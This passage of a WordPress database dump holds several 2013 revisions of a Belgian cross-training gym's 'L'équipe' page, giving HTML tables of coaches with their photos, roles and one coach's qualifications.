style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:06:30', '2013-07-03 19:06:30', '', 20, 'http://www.crosstrainingcenter.be/?p=238', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(240, 1, '2013-07-03 19:35:31', '2013-07-03 19:35:31', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:35:31', '2013-07-03 19:35:31', '', 20, 'http://www.crosstrainingcenter.be/?p=240', 0, 'revision', '', 0),
(239, 1, '2013-07-03 19:33:18', '2013-07-03 19:33:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:33:18', '2013-07-03 19:33:18', '', 20, 'http://www.crosstrainingcenter.be/?p=239', 0, 'revision', '', 0),
(242, 1, '2013-07-03 19:38:46', '2013-07-03 19:38:46', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch\r\n\r\nBaccalauréat en éducation physique\r\nSpécialisation en psychomotricité\r\nPréparateur physique et entraineur de football diplômé de l’URBSFA\r\nEnseignant en éducation physique\r\nPratiquant de foot, triathlon, tennis et VTT</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:38:46', '2013-07-03 19:38:46', '', 20, 'http://www.crosstrainingcenter.be/?p=242', 0, 'revision', '', 0),
(243, 1, '2013-07-03 19:39:31', '2013-07-03 19:39:31', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:39:31', '2013-07-03 19:39:31', '', 20, 'http://www.crosstrainingcenter.be/?p=243', 0, 'revision', '', 0),
(244, 1, '2013-07-03 19:39:55', '2013-07-03 19:39:55', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td 